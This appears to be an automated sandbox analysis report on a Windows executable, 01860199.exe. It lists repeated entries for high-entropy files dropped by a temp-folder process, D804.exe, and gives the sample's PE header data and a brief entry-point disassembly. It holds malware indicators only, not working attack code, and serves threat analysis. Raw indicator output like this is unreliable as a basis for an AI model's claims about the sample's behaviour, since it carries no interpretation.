                                                                                                                            Preview:NWCXBp.8.z.....-.d._!.....@..#X.."......Y..U.......cM.x~.s..T.H........Q$4..9.w~.k.....x..^5...j.%..S.o..]...1..f.M....3...U.F.A.4.?..7..uO..s`.}.@{+...e......7<..&oY#r...r...z.\.=.G.q......B...r.....)A.L.V...q.9:..\..X....tC.U.....}....m....%..F..\...X...T*.S..V..2....Z..W.......7.IV...;.....QQ.~..k^.dl.,(@r...`Lg...}.{....x.S..)f.....l......I..,.....BI.f........\.....W...?...U!/e...2....v&S.\........x....b{.@...d.[..{.....eX.r..A.{...l....#r.....%.t...L.-..._.c.N.`...noT=a..dEg.Q......\.....y{..c.C.O... 5.u....P.Qg........|.H.c....,.h:..w`I...G.0 .[...1L.....a..[.V+.).;.a~..V0dG..N.....!..A..C]!.....,.h.yG8Y.$..`|.).%..< .?..YP..<..P.J.&gR..#.|..t......5.}..[^u....D d.].fF....`Pk.}..8:..d3=.<.....H...t.8.P..u....U...)8p....N.6.pk..xV...H.).=..5eg.B...t..t............9.'.......?+.....e....y8G..@.R.H..t..I.i.._...3...-I...Y....!..*.c0.9Uf.D._..u..5.x*d..?...SJ........=..u....W.:|.&.!.7.M..5.....W..hX..J~*.-.O%..}..p".b
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.846175115409487
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:lJ1s6FO4IhT59YFZJFCvHl9rmSau3px71HUKZ1ewzf2S9HE6qI4kbD:lxUfT59oEPFxVZ11D2S26qtuD
                                                                                                                            MD5:52168A390BE9F15F0FDF13FD6DA0F234
                                                                                                                            SHA1:F348551065FA5C19A9B1FAC115BF4BE5CC6C581F
                                                                                                                            SHA-256:E399FC4C7FEF398449FF76137BBEFE0CD8132384A9B35E3ECE6BB95F1BA46ACC
                                                                                                                            SHA-512:9A687ADA5FAA256DE1590290D8EE6DC9FDD3558B7FF7759FD703A6BAFF0D098843C76069A4A08389DB7C4F75B8C84201B47337354E47666CBD798D914621595D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NWCXB..]..&..:..lM.....f0.,1oi...u.-..o..b.... .F.eQ...m`+2.H...Q.&......0V.A..-..G....q.6.UsP....j\.2.[...Z....;Z^5..H......g.9.!.4`.....TE.).0.F..q.>..l..!X.^.-....$::.=>.!.0 ....o..9...T...f.^.5...).7.T...K.J.#[)......M.-e......c.:....4P.7..j8...!...7oE.]V8....5./.H)m.Y6.....w..I..Z(!.bu..Gh...l.U.....#....L&..m...`B.....p...L.............)..0.w....E$"..F?.,~.....a.....<.......F.."U..=......E.>.75W.'-5...c...B..[...2.;,..K..gRJKf...<..3...I.z.H.f..2b...|.I.P.(P1.............UZ.GP.1!..kJ...h...t6..q..C&.H...+..)...1n...i....R....N....S......:.Y......Fn...@..+.....x.SD.t....s...J..S./0j'.R)6..N..v...@......N..............\\G....3.5<.....^p......!*hms.........4..*..M}F.OT....D.(N .P+xR.v]..?..@!.d.MTK...35@...H~'.G/....N?.w...$...o..4.qF....r...n..%.51..L.nL.x.\.k...Se..]@.N.]C..sQ..^8!..^M.~s!.I.#%R..H'.I..$....h.;.n\..?XG..p..t...G...(.....#.t`._..R.....P.;...._.;M.b..A.p(.I.2.'....H....{l.T ...T.Q.W."=.y.^.....I.....S8..#...8.N
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.846175115409487
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:lJ1s6FO4IhT59YFZJFCvHl9rmSau3px71HUKZ1ewzf2S9HE6qI4kbD:lxUfT59oEPFxVZ11D2S26qtuD
                                                                                                                            MD5:52168A390BE9F15F0FDF13FD6DA0F234
                                                                                                                            SHA1:F348551065FA5C19A9B1FAC115BF4BE5CC6C581F
                                                                                                                            SHA-256:E399FC4C7FEF398449FF76137BBEFE0CD8132384A9B35E3ECE6BB95F1BA46ACC
                                                                                                                            SHA-512:9A687ADA5FAA256DE1590290D8EE6DC9FDD3558B7FF7759FD703A6BAFF0D098843C76069A4A08389DB7C4F75B8C84201B47337354E47666CBD798D914621595D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NWCXB..]..&..:..lM.....f0.,1oi...u.-..o..b.... .F.eQ...m`+2.H...Q.&......0V.A..-..G....q.6.UsP....j\.2.[...Z....;Z^5..H......g.9.!.4`.....TE.).0.F..q.>..l..!X.^.-....$::.=>.!.0 ....o..9...T...f.^.5...).7.T...K.J.#[)......M.-e......c.:....4P.7..j8...!...7oE.]V8....5./.H)m.Y6.....w..I..Z(!.bu..Gh...l.U.....#....L&..m...`B.....p...L.............)..0.w....E$"..F?.,~.....a.....<.......F.."U..=......E.>.75W.'-5...c...B..[...2.;,..K..gRJKf...<..3...I.z.H.f..2b...|.I.P.(P1.............UZ.GP.1!..kJ...h...t6..q..C&.H...+..)...1n...i....R....N....S......:.Y......Fn...@..+.....x.SD.t....s...J..S./0j'.R)6..N..v...@......N..............\\G....3.5<.....^p......!*hms.........4..*..M}F.OT....D.(N .P+xR.v]..?..@!.d.MTK...35@...H~'.G/....N?.w...$...o..4.qF....r...n..%.51..L.nL.x.\.k...Se..]@.N.]C..sQ..^8!..^M.~s!.I.#%R..H'.I..$....h.;.n\..?XG..p..t...G...(.....#.t`._..R.....P.;...._.;M.b..A.p(.I.2.'....H....{l.T ...T.Q.W."=.y.^.....I.....S8..#...8.N
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.830156468353167
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Zq8/aexzesYprL3xfH6M/x1ZtUL6RKy0Wxwmd8Aw9Qgc+R3b+ma9a9A/Gc9ynb5Z:ZnxDYpfBfH6CDZtu0xwqplE3NCHucUnL
                                                                                                                            MD5:B9FB8915A21878EC12E2E6178E37039F
                                                                                                                            SHA1:E4431363E4DFC3D46842DCDA0A1CE0838CD7CDD1
                                                                                                                            SHA-256:A70EBE43C464C5571B5624D6D80EF71865924301445B813F6DCF82C860AA79DC
                                                                                                                            SHA-512:16A58C5AE14863AA01B18606D1699E4D652FA634A6188C8D2B51D14300E5A0AABC4DE9D738CBF509E9197390BD127EEC52893D432152D451871C7333A848A4B8
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GNLQN...(..]v^.dL..P}{..7 ..y.7./..~.L0h.^/v.#.Xu.[.%!^......A..f1... o.w.....Y..E7..x.ob..!..O...c....PW.s..$.+s./.>z..L..f....`<=..y..>......9.T..A.j.iIx.;..YJ..v..o.r.^f.=D.. o.....`..j..c.r[..b{..-.3x..YLg..p.e.l.h:..w...?.!~.w.....FS.....(.U..0...%..x..B.`.e6...*..W...".Cy....F...Z,.z.#..1..P.lr.5..,..*3...Mv...#....^.......Y...0.I.$.......Bc.....0....1.?.fJ6h...%{7c...=......3eB(W.(.J..<....2G.QfMDY.....mw..}..^.].U.. .T%..LH.5\N3....qYNr2........G.`...A...L.n.;.....:o...q....[f.W@FA>u0.....a...d.L.I.1..}.f.......2r.-=.4.K@(.TBD.dBA......$S...N.......L....Nr..I*..]....*.W.t.'T{......~.A.......jG...`~7.....w.L.[.{x..a..0........a..h...0B.7\...Zh.s.Ul^......Y......;.``..p..q.:Xf~...t..nQ....."...;G_B.@*m..J.....Y...j..U.E#..rX....2$...F......K.OP.....F......K......vwfr.W.C...r..\P.(q...r...C.L..n.~#....3Sb..~....u..a_9..n...>y.CFA..,.|M.....8.oN.6x.Hj..;?y.j.lt.{.sR.v.1..G..7a...F...7....O)...y6....2......wP...#..q%.3....I}X-...K..*.@4..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.830156468353167
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Zq8/aexzesYprL3xfH6M/x1ZtUL6RKy0Wxwmd8Aw9Qgc+R3b+ma9a9A/Gc9ynb5Z:ZnxDYpfBfH6CDZtu0xwqplE3NCHucUnL
                                                                                                                            MD5:B9FB8915A21878EC12E2E6178E37039F
                                                                                                                            SHA1:E4431363E4DFC3D46842DCDA0A1CE0838CD7CDD1
                                                                                                                            SHA-256:A70EBE43C464C5571B5624D6D80EF71865924301445B813F6DCF82C860AA79DC
                                                                                                                            SHA-512:16A58C5AE14863AA01B18606D1699E4D652FA634A6188C8D2B51D14300E5A0AABC4DE9D738CBF509E9197390BD127EEC52893D432152D451871C7333A848A4B8
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GNLQN...(..]v^.dL..P}{..7 ..y.7./..~.L0h.^/v.#.Xu.[.%!^......A..f1... o.w.....Y..E7..x.ob..!..O...c....PW.s..$.+s./.>z..L..f....`<=..y..>......9.T..A.j.iIx.;..YJ..v..o.r.^f.=D.. o.....`..j..c.r[..b{..-.3x..YLg..p.e.l.h:..w...?.!~.w.....FS.....(.U..0...%..x..B.`.e6...*..W...".Cy....F...Z,.z.#..1..P.lr.5..,..*3...Mv...#....^.......Y...0.I.$.......Bc.....0....1.?.fJ6h...%{7c...=......3eB(W.(.J..<....2G.QfMDY.....mw..}..^.].U.. .T%..LH.5\N3....qYNr2........G.`...A...L.n.;.....:o...q....[f.W@FA>u0.....a...d.L.I.1..}.f.......2r.-=.4.K@(.TBD.dBA......$S...N.......L....Nr..I*..]....*.W.t.'T{......~.A.......jG...`~7.....w.L.[.{x..a..0........a..h...0B.7\...Zh.s.Ul^......Y......;.``..p..q.:Xf~...t..nQ....."...;G_B.@*m..J.....Y...j..U.E#..rX....2$...F......K.OP.....F......K......vwfr.W.C...r..\P.(q...r...C.L..n.~#....3Sb..~....u..a_9..n...>y.CFA..,.|M.....8.oN.6x.Hj..;?y.j.lt.{.sR.v.1..G..7a...F...7....O)...y6....2......wP...#..q%.3....I}X-...K..*.@4..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.853154102635187
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:xnXYe/nMwVEw5g9YbY45fk1+lyxpjD02QXedOq7zRGmBehZbD:RXFhja9M5fk1dxJD02wSOyzRBOD
                                                                                                                            MD5:9CF13F65E6CEB7AB2CA4DA18B9823A45
                                                                                                                            SHA1:22BEF8E81CD11E6ED8EAAE5E109D60BF84A79A29
                                                                                                                            SHA-256:C35AC8003A04CC9633C2EA91EC00B58A714654ED1C90E8C741FC62F3AE129367
                                                                                                                            SHA-512:632C93D7FCAB56590663E064139582E4DF6EB0F63221B0C3A24F035321E12EFFAB6F1AB3B91EBAACD5BB6C188DF15BBCAAE0F54A7267BDFBD6FF37ADBDE32934
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:HQJBR..%.R..)..u..s_we...~<.rw..Jl.pL.H..."'G.QB...U...s.y............r1.)+....5..m..R...r..H?.....V../q.-..S....f.@..D.l......}.N....a....1s....:.Xo.&[..E..5...4.#.R...Y.............la(1Q...6..?4.\"q....F5. /.........'.I...a..p0QM..~..^.x.S?......YB....z.^J.......T....l..r_i....8.;..0.u|.yO......O.......d...[H.M.......W![..Bx..].....8..#...vj....b.R......&q#....c$..c....,.pe....M6j...,....L...R....;.(+.U..o(n...&....?|8.W|.y.y............>We..D.ie..y....../../...Sj....^.}....Iy.@m. .Q..m....jf|...!....s...D.....T..q.e.t,].....E:a..[.........r..$C...z...{B.Y...KT...h...kN7.7...e..0/.p`.a?....AU.gh....*.n....,...........:?...8PV..........)q......7.Q\.bo.....`...E.\O<...e.#.......g...Sp...|$B..w...x.\.^.JhI...x......sx.y`......X..e..]...xv..=...M;..#.C..Qu......'.`=%U{.]...;...S.>7.PK.'.....W...*W......),..........n]R.n%.........Z...^..d.P..9.76|g.;C..nW.i...2.f...~...........uNRP2.`J.s.).Ez.z+....x..i....B......,L..j.MMzN......
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.853154102635187
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:xnXYe/nMwVEw5g9YbY45fk1+lyxpjD02QXedOq7zRGmBehZbD:RXFhja9M5fk1dxJD02wSOyzRBOD
                                                                                                                            MD5:9CF13F65E6CEB7AB2CA4DA18B9823A45
                                                                                                                            SHA1:22BEF8E81CD11E6ED8EAAE5E109D60BF84A79A29
                                                                                                                            SHA-256:C35AC8003A04CC9633C2EA91EC00B58A714654ED1C90E8C741FC62F3AE129367
                                                                                                                            SHA-512:632C93D7FCAB56590663E064139582E4DF6EB0F63221B0C3A24F035321E12EFFAB6F1AB3B91EBAACD5BB6C188DF15BBCAAE0F54A7267BDFBD6FF37ADBDE32934
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:HQJBR..%.R..)..u..s_we...~<.rw..Jl.pL.H..."'G.QB...U...s.y............r1.)+....5..m..R...r..H?.....V../q.-..S....f.@..D.l......}.N....a....1s....:.Xo.&[..E..5...4.#.R...Y.............la(1Q...6..?4.\"q....F5. /.........'.I...a..p0QM..~..^.x.S?......YB....z.^J.......T....l..r_i....8.;..0.u|.yO......O.......d...[H.M.......W![..Bx..].....8..#...vj....b.R......&q#....c$..c....,.pe....M6j...,....L...R....;.(+.U..o(n...&....?|8.W|.y.y............>We..D.ie..y....../../...Sj....^.}....Iy.@m. .Q..m....jf|...!....s...D.....T..q.e.t,].....E:a..[.........r..$C...z...{B.Y...KT...h...kN7.7...e..0/.p`.a?....AU.gh....*.n....,...........:?...8PV..........)q......7.Q\.bo.....`...E.\O<...e.#.......g...Sp...|$B..w...x.\.^.JhI...x......sx.y`......X..e..]...xv..=...M;..#.C..Qu......'.`=%U{.]...;...S.>7.PK.'.....W...*W......),..........n]R.n%.........Z...^..d.P..9.76|g.;C..nW.i...2.f...~...........uNRP2.`J.s.).Ez.z+....x..i....B......,L..j.MMzN......
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8415920865244875
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:iANa1v72aDtBcmwj2VB0+5rhwuDjQyeoSTTGKtVxAzHglPSmm1+KtGmXA500QLLE:Ez+mAy0+5rhzQNoEyH2SAKtFp+D
                                                                                                                            MD5:EE5298F528E0AFC74547427578148D46
                                                                                                                            SHA1:CD2C62F5526AF2035B419F5F3C95B8DC8BFE06A1
                                                                                                                            SHA-256:82A3B2856D207872DB2E978AD1EE1C92108FAE28FFE5FC708E68A77B37356C74
                                                                                                                            SHA-512:319FE328B82F31CF5618D4EB5716494FE6330F33E937E7BD36F391B9BC75E6F73329F152503CB38FD79E3CA5D3CD058B78AB22B47155BECBC911814960EEEC4C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LFOPO..;....$...v.*y..F.!..[.F4.,..U`.U.[.AA.g|......p..;.c.M..w.......Ju...y.4.9..a....'n.9.....0..".'.Mt[...!...O.9.Z...q.&.2v&.&.+o......B.k`{.*tV...... y.z;..9Z.{{.G...,)P.g7.-Y30..p......F{*(.j0?.c...<.1..z..e.../A..}.2...."........O.>._2...i....."_(.X.0{_k-l.m;.k.^...2....{.....M..4.IV|K.Q..}...`...u...q.`..A8u8.uB..~.y@<..I.y..{4...."...X.Q...r.v...d....C.V...A.b..&|.&...]q..^1.}......S...+d..BiCw..7..~......e.-.^....(...@v^iC6..D.0..O..-qr...x*.&.....t..8.....T.Bu}.yD...!R..:..E]...$.)y..b%...p.mV..dj..I..!-....J.... ..}.......VB...$J.F/.O..y..Dyl......3d.....t..R.W...!1.x.L.G.F.9.......3@&..z(.....zu..j.....o.....e1.-.F..B|..;g.........R.......vR...s.....?C5.n.-]..!..+...K._..M.\2;X........L.k.....].BA...:.........b..X...$F.%....5..1..../.....>`.......r..r...7.K. ,....*.J...B;.. .!....u.;..C8.Wj.....E..{e......l.RY...Z...E..>j$f...t.w..S...|...9.....zk.....{.N..Y0}(P]rN$..6=)m2.k?..L....D.....2QB..G..+...x..<.....~..R.Hr.w..*.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8415920865244875
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:iANa1v72aDtBcmwj2VB0+5rhwuDjQyeoSTTGKtVxAzHglPSmm1+KtGmXA500QLLE:Ez+mAy0+5rhzQNoEyH2SAKtFp+D
                                                                                                                            MD5:EE5298F528E0AFC74547427578148D46
                                                                                                                            SHA1:CD2C62F5526AF2035B419F5F3C95B8DC8BFE06A1
                                                                                                                            SHA-256:82A3B2856D207872DB2E978AD1EE1C92108FAE28FFE5FC708E68A77B37356C74
                                                                                                                            SHA-512:319FE328B82F31CF5618D4EB5716494FE6330F33E937E7BD36F391B9BC75E6F73329F152503CB38FD79E3CA5D3CD058B78AB22B47155BECBC911814960EEEC4C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LFOPO..;....$...v.*y..F.!..[.F4.,..U`.U.[.AA.g|......p..;.c.M..w.......Ju...y.4.9..a....'n.9.....0..".'.Mt[...!...O.9.Z...q.&.2v&.&.+o......B.k`{.*tV...... y.z;..9Z.{{.G...,)P.g7.-Y30..p......F{*(.j0?.c...<.1..z..e.../A..}.2...."........O.>._2...i....."_(.X.0{_k-l.m;.k.^...2....{.....M..4.IV|K.Q..}...`...u...q.`..A8u8.uB..~.y@<..I.y..{4...."...X.Q...r.v...d....C.V...A.b..&|.&...]q..^1.}......S...+d..BiCw..7..~......e.-.^....(...@v^iC6..D.0..O..-qr...x*.&.....t..8.....T.Bu}.yD...!R..:..E]...$.)y..b%...p.mV..dj..I..!-....J.... ..}.......VB...$J.F/.O..y..Dyl......3d.....t..R.W...!1.x.L.G.F.9.......3@&..z(.....zu..j.....o.....e1.-.F..B|..;g.........R.......vR...s.....?C5.n.-]..!..+...K._..M.\2;X........L.k.....].BA...:.........b..X...$F.%....5..1..../.....>`.......r..r...7.K. ,....*.J...B;.. .!....u.;..C8.Wj.....E..{e......l.RY...Z...E..>j$f...t.w..S...|...9.....zk.....{.N..Y0}(P]rN$..6=)m2.k?..L....D.....2QB..G..+...x..<.....~..R.Hr.w..*.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.854371994441411
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:/d1ypAFWQE6SY1zuPr4JFUEDuFNYXh3IE5PeLFD19TKGKXw+4GWtbD:/Ahquj4EEx3IE9sX9PKXwjD
                                                                                                                            MD5:59E6F12298E86A5D464973BB57A1B977
                                                                                                                            SHA1:D7870AC283858D8F169F8D035D72956873F510CE
                                                                                                                            SHA-256:2039D2D15E2959D71988CECA903D523304E8B479E93ADA451742184B217DB4AC
                                                                                                                            SHA-512:B97A4C2B74F5AC8C3BCE5C060CD8B05123DED00018A370145DBB20139D9109F1E0EF348A6081636B00774284420E9ED90ACBD2FE8DF5AE7722C4E91ED9D5E5B0
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NIRMEn....0.........../=....;,'W<.&..<=../.H.ge..q.O..UT.{..c....W...4.....s..,F.........Y....e...u.m..$l1V..oM.6.._.t.2.<....H*Q.+..Q.. {Y{K.v.c..;|../JCq..er..*>b..x..0V....\.#.!..bD.'..*..,... ......j./..i......$)dJ..d.|.WQ..+.lp...Pt3.&.Q..$.7.5..&..=*..l!+....._%.u.....2.q.Q.%n1..i._.t.^....z.}.`. ...r..dxCm.a.(....\{.r..f..|...-..5.....V.T...W\..ys...F..2.^..?1..<.G1C3T46.vY`q..$.....2...&.MS....<w.......J.~.O.(H.A ....y... i:..R...-...L.4..$..}.D....mi........'...t..2.oN O8.sj5.[:D>...8....F.[...)...0'5AE1.!;E:...................}.5.w.&........&x...Pq..u.b...#g.W,A....);r|:...g.1..H....N[.v5.%i..9@.h5I.....6.m7....h..x.g..x\...[...xDT.....m).>o.L$..S....s...u....W.gH...o.#$....!..{.O.iG.<.xN...?....Z.y..$d..]r.:y...GC........g...Q...;.T...D.gT3J.i.{.O..q.r.........l._..@...O....a....bhf.zlOs.....k..z.W...=.Z;&H....F........o.t.....G.c.iSP."...clLNO1..:.U4.....6?....X7@.x%.U8p.....TW..9[a.C.h..........-JO...mOo.EZ....#e..G.p.~&N......
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.854371994441411
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:/d1ypAFWQE6SY1zuPr4JFUEDuFNYXh3IE5PeLFD19TKGKXw+4GWtbD:/Ahquj4EEx3IE9sX9PKXwjD
                                                                                                                            MD5:59E6F12298E86A5D464973BB57A1B977
                                                                                                                            SHA1:D7870AC283858D8F169F8D035D72956873F510CE
                                                                                                                            SHA-256:2039D2D15E2959D71988CECA903D523304E8B479E93ADA451742184B217DB4AC
                                                                                                                            SHA-512:B97A4C2B74F5AC8C3BCE5C060CD8B05123DED00018A370145DBB20139D9109F1E0EF348A6081636B00774284420E9ED90ACBD2FE8DF5AE7722C4E91ED9D5E5B0
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NIRMEn....0.........../=....;,'W<.&..<=../.H.ge..q.O..UT.{..c....W...4.....s..,F.........Y....e...u.m..$l1V..oM.6.._.t.2.<....H*Q.+..Q.. {Y{K.v.c..;|../JCq..er..*>b..x..0V....\.#.!..bD.'..*..,... ......j./..i......$)dJ..d.|.WQ..+.lp...Pt3.&.Q..$.7.5..&..=*..l!+....._%.u.....2.q.Q.%n1..i._.t.^....z.}.`. ...r..dxCm.a.(....\{.r..f..|...-..5.....V.T...W\..ys...F..2.^..?1..<.G1C3T46.vY`q..$.....2...&.MS....<w.......J.~.O.(H.A ....y... i:..R...-...L.4..$..}.D....mi........'...t..2.oN O8.sj5.[:D>...8....F.[...)...0'5AE1.!;E:...................}.5.w.&........&x...Pq..u.b...#g.W,A....);r|:...g.1..H....N[.v5.%i..9@.h5I.....6.m7....h..x.g..x\...[...xDT.....m).>o.L$..S....s...u....W.gH...o.#$....!..{.O.iG.<.xN...?....Z.y..$d..]r.:y...GC........g...Q...;.T...D.gT3J.i.{.O..q.r.........l._..@...O....a....bhf.zlOs.....k..z.W...=.Z;&H....F........o.t.....G.c.iSP."...clLNO1..:.U4.....6?....X7@.x%.U8p.....TW..9[a.C.h..........-JO...mOo.EZ....#e..G.p.~&N......
                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):6.585305891932375
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:01860199.exe
                                                                                                                            File size:289280
                                                                                                                            MD5:3d8207e1ce6762ff10db118bee3bd99b
                                                                                                                            SHA1:82a02d6e00de00074b48ba3cc76424a6efe3e6ab
                                                                                                                            SHA256:c38267836dde53953018c962a372e8e74153f97932418b682fc653ecfcb7bece
                                                                                                                            SHA512:ca346b7fcd302a5d4afbdceb8d4a50f28d14068d9a72ad9960f647f19810d4936d0514a9ecd3fb2a14b87e7f82c0df33aeeb02bfa64beb394f5eb46fa6810d1a
                                                                                                                            SSDEEP:3072:1nsNTcFBW0dKNogILXJ6WPLpjHysySMX3YpCUtn5grTtiFmAevZ:qNTcddpgInDtHMn3frTti9
                                                                                                                            TLSH:E7542A1392A13C90F9264B769E1FC6E8B65EF5708F197B69325CBA1F0872172C273B11
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L...e..c...........
                                                                                                                            Icon Hash:454545454545611d
                                                                                                                            Entrypoint:0x404e59
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x63859465 [Tue Nov 29 05:11:01 2022 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:5
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:5
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:5
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43
                                                                                                                            Instruction
                                                                                                                            call 00007F54A8CFEB13h
                                                                                                                            jmp 00007F54A8CFA1ADh
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                            test ecx, 00000003h
                                                                                                                            je 00007F54A8CFA356h
                                                                                                                            mov al, byte ptr [ecx]
                                                                                                                            add ecx, 01h
                                                                                                                            test al, al
                                                                                                                            je 00007F54A8CFA380h
                                                                                                                            test ecx, 00000003h
                                                                                                                            jne 00007F54A8CFA321h
                                                                                                                            add eax, 00000000h
                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                            mov eax, dword ptr [ecx]
                                                                                                                            mov edx, 7EFEFEFFh
                                                                                                                            add edx, eax
                                                                                                                            xor eax, FFFFFFFFh
                                                                                                                            xor eax, edx
                                                                                                                            add ecx, 04h
                                                                                                                            test eax, 81010100h
                                                                                                                            je 00007F54A8CFA31Ah
                                                                                                                            mov eax, dword ptr [ecx-04h]
                                                                                                                            test al, al
                                                                                                                            je 00007F54A8CFA364h
                                                                                                                            test ah, ah
                                                                                                                            je 00007F54A8CFA356h
                                                                                                                            test eax, 00FF0000h
                                                                                                                            je 00007F54A8CFA345h
                                                                                                                            test eax, FF000000h
                                                                                                                            je 00007F54A8CFA334h
                                                                                                                            jmp 00007F54A8CFA2FFh
                                                                                                                            lea eax, dword ptr [ecx-01h]
                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                            sub eax, ecx
                                                                                                                            ret
                                                                                                                            lea eax, dword ptr [ecx-02h]
                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                            sub eax, ecx
                                                                                                                            ret
                                                                                                                            lea eax, dword ptr [ecx-03h]
                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                            sub eax, ecx
                                                                                                                            ret
                                                                                                                            lea eax, dword ptr [ecx-04h]
                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                            sub eax, ecx
                                                                                                                            ret
                                                                                                                            mov edi, edi
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            sub esp, 20h
                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                            push esi
                                                                                                                            push edi
                                                                                                                            push 00000008h
                                                                                                                            pop ecx
                                                                                                                            mov esi, 004012D8h
                                                                                                                            lea edi, dword ptr [ebp-20h]
                                                                                                                            rep movsd
                                                                                                                            mov dword ptr [ebp-08h], eax
                                                                                                                            mov eax, dword ptr [ebp+0Ch]
                                                                                                                            pop edi
                                                                                                                            mov dword ptr [ebp-04h], eax
                                                                                                                            pop esi
                                                                                                                            Programming Language:
                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x284b80x64.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x26f0000x19398.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2890000xde4.reloc
